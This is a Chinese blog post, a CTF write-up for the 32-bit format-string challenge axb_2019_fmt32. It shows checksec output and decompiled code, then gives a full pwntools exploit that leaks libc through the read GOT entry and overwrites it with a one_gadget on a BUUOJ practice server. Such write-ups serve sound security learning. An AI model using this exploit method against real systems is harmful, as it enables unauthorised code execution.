加载头像

axb_2019_fmt32

Ubuntu 16


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/axb_2019_fmt32/axb_2019_fmt32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

IDA

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
char s[257]; // [esp+Fh] [ebp-239h] BYREF
char format[300]; // [esp+110h] [ebp-138h] BYREF
unsigned int v5; // [esp+23Ch] [ebp-Ch]

v5 = __readgsdword(0x14u);
setbuf(stdout, 0);
setbuf(stdin, 0);
setbuf(stderr, 0);
puts(
"Hello,I am a computer Repeater updated.\n"
"After a lot of machine learning,I know that the essence of man is a reread machine!");
puts("So I'll answer whatever you say!");
while ( 1 )
{
alarm(3u);
memset(s, 0, sizeof(s));
memset(format, 0, sizeof(format));
printf("Please tell me:");
read(0, s, 0x100u);
sprintf(format, "Repeater:%s\n", s);
if ( strlen(format) > 0x10E )
break;
printf(format); //
}
printf("what you input is really long!");
exit(0);
}

0x02


思路 fmtstr

1.泄露libc

2.fmtstr执行one_gadget

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

context(os='linux', arch='i386', log_level='debug')
path = './axb_2019_fmt32'
# io = process([path])
io = remote("node4.buuoj.cn", 27912)
elf = ELF(path)
libc = ELF("libc-2.23.so")

read_got = elf.got['read']
payload = flat(b'a', read_got, b'%8$s')
io.sendafter(b'me:', payload)
read_addr = u32(io.recv(18)[-4:])
print('[+] read_addrss', hex(read_addr))
libc_base = read_addr - libc.symbols['read']
one_gadget = libc_base + 0x3a80c

payload1 = flat(b'a', fmtstr_payload(8, {read_got: one_gadget}, 0xa))
io.sendafter(b'me:', payload1)

io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體